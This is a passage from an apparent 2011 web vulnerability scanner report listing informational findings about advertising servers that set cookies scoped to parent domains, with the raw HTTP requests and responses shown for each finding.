Referer: http://img-cdn.mediaplex.com/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=uvn4ybjeh3ciqrzoi2ilygjh; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=uvn4ybjeh3ciqrzoi2ilygjh; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-1,xta-1,trf-2,tpp-3,tbc-1,ntd-1,tvc-2,tmm-1,xtb-1,tnp-1,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:11 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-2,thp-1,txb-1,tks-2,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:11 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=42; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:11 GMT; path=/
Set-Cookie: PCR_BrowserId=d9954876-3a8e-4f70-8099-40c2ea2161b9; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:48:14 GMT
Content-Length: 166986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...

11.4. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2925993182975414771 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4e62cac9*7ILJjOd50C*xAn6CqfjViVWUXPcP2NGnpPxnQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

11.5. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?pub=5757418&cch=5766966&code=5766974&l=728x90&aid=26912047&ahcid=2168902&bimpd=_P8jnlWa9XstK_JlmmehibBCY86uUcZ8orSis2gk3CgGuM8NRppyPQMYvcwYVWxeqx53lV-injqapvMTqVcy93ETQudoxG65t8gPvD3_8uXTH1PXOPFQZu8QV_sfud_H-APXWDieQ47BkVHFFBn37s3aR3R9fKaUZJwqF3RKDtidgFaK5usOyzENC88rTUlt9K10asyG35OWlNfIYOZ-eD5tcSKw-zblptFUhK9YrBvJ-WVZmeLXwW90Vc9Kb9XoiPnsI1H5EzsiLAXyc7PFNmMqw1dLCgnGdMDgUmN3gwdG_Ur_2SMU4K10y_Sli8mM2o2RfArbjquS3LhtH_oucb3wc-cQ7FRKnITKYzO3zYXWG83x93SQchtOADUffiJhCEHm6r5PNXkH9qRXbUWExW_-Tu619iR6e1KbNlVj8jLndn3HHWXSm6j08SLj-h_ckdMj51v2x5gNhdpsMl_xftjg47NtKOd3aMYaFKX0mDx-mbKM0JHYn1hPNWK3mE7pzqC_aS7mkgsjA3S3GAANk8l2hYjwLveMS5-0Prm8ku-d-0Mgw9kibbpEMGHOE3HL6dCtmc69w_hrmFS4bSqF1Ubrzov4KJkplEjIfx4sijhgID_WtH2HGV-ZlBaxQA1ij1j_O9y58VxgD6JjAd6GfmoJ8UbwkKQyww1upyp3jn-KeGFWA05C4wMLlJET2Sr393OncBALoxLqvhLiy_Csz4BhnEKFF2M8my_fgvGuVC-BGn7V08Zk_msX51p9Pm_1V71_KFY8MHiZdUStS_Pc88kzr_aJ80D7tEUMLPW-_InB3ZbanTW1OTZfNoJuT_Q8bPiK77OYvzyO19oo0lS1JrBteXm6E3IqGkdPbGLUoEv66yPDCbC2aqvzIe2Oz4Dl&acp=1.72 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:06 GMT
Set-Cookie: uid=4447451951399893309; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=C5fpYpilMyxHrPIR--3QkiHvKDNi_uncK1CZ9qMjBiHJxmeG753N3cyfpzvDjP2CIQIVonNUzt8CzdLhUy1rOScdAv5WskG6P8YmJYM-cP7i3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:06 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:05 GMT
Content-Length: 9577


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

11.6. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:57:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4e62ccf1@cdn.turn.com; path=/; domain=.adbrite.com; expires=Tue, 06-Sep-2011 00:57:21 GMT
Set-Cookie: rb2=CiMKBjc0MjY5NxjDupW2NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; path=/; domain=.adbrite.com; expires=Sat, 03-Dec-2011 00:57:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

11.7. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=f09828 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2dL1poyhgAWP5Eo4es3kaxW1feZP1YNm+vskrklkV+oIYNjONkByQANVsWNI2LUQx8TCq2WGPl5VXzYIGTGOuqjioCwYxcCLHmCkxz4ESp094zcjlIQUTzGncppB8+UZ13jX8XjRx0I3BL+KAGqLYtL1yR5cosgVr9TChjigtCT7xLSmTxoSu7GRigj7TGlm9TWroY0Q39+iNlTc3BrdjBe0HTkWYH0ShlG+acfzLReAv8qXohHLhe5F9dMgHJSO83a8oSnKmeKGYbW9i7MxX9f9dHDkI4yUr7YhzEgSpDzIQoN8mjvDq8uAicdwkS3Vj6tHxg4FjZP5oJKn7RMzXdrHwiAm5HkJNNq7rKZe60tdAVpLfFLIZU2NXYF5Ng4nUe9B7vLt/JeKgOkuoMXRBd9LPrc+/Bs4Zy2M8IMqrZma4/6vOjeaSPoErPG5h9v54soIwRm/p6mPbNHPXqMGI6iAEpBp39vZnCJ8TPcPuiSkxaucITwjR4ls8ahmnjLIaytIoGLCJ/Gk+WsM5cUzAfduzHzcfr1tiWa348TV6PwF3eayssB/NpybGnJ4mkGwbtdvs76dMdYRClhQnokDRRFqfqHlR5S6hY3Cufhpq2otZn8gHLLXi0UYaHuTtyjHcoW9gZagVsKBU5RI+04gGuvIwxRnBEKwniHi8ZYHXm0BGAaf2rvKUw7FcsM1MDjjAtYrWzUobzJubFmLscTjITZE83wdVVKbPTHCW+E6UqZY3vs2GJOkpG7gaCzt7i/PmMgRey9Ep7w5TQuNKaPbYm0+V7iZOGAnsWlpG0D2TcSxjX6nkaxa+P0zbU7mixMT1h5TkHQHrU4mEOBygWqOWYZoz2ReGBIBfVZfHHBb73A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
